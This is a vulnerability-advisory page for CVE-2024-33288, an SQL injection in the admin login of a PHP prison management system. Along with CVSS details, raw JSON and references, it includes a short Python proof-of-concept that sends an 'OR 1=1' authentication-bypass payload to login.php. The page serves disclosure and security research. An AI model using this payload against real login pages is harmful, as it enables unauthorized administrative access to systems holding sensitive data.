Security Vulnerability Report
中文
CVE-2024-33288 CVSS 7.3 HIGH

CVE-2024-33288

Published: 2026-05-08 06:16:09
Last Modified: 2026-05-08 18:16:32

Description

Prison Management System Using PHP v1.0 was discovered to contain a SQL injection vulnerability via the username on the Admin login page.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Prison Management System Using PHP 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_login(target_url): # Target login endpoint login_url = f"{target_url}/login.php" # Payload for SQL Injection to bypass authentication # Example: ' OR '1'='1 payload_data = { "username": "admin' OR '1'='1--", "password": "random_password" } try: # Send POST request to the target response = requests.post(login_url, data=payload_data) # Check if login was successful (based on response content) if response.status_code == 200 and "dashboard" in response.text.lower(): print("[+] Exploit Successful! Logged in as Administrator.") else: print("[-] Exploit Failed or Patched.") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": target = "http://127.0.0.1/prison_system" exploit_login(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-33288", "sourceIdentifier": "[email protected]", "published": "2026-05-08T06:16:09.293", "lastModified": "2026-05-08T18:16:31.953", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Prison Management System Using PHP v1.0 was discovered to contain a SQL injection vulnerability via the username on the Admin login page."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/52017", "source": "[email protected]"}, {"url": "https://www.sourcecodester.com/sql/17287/prison-management-system.html", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/52017", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}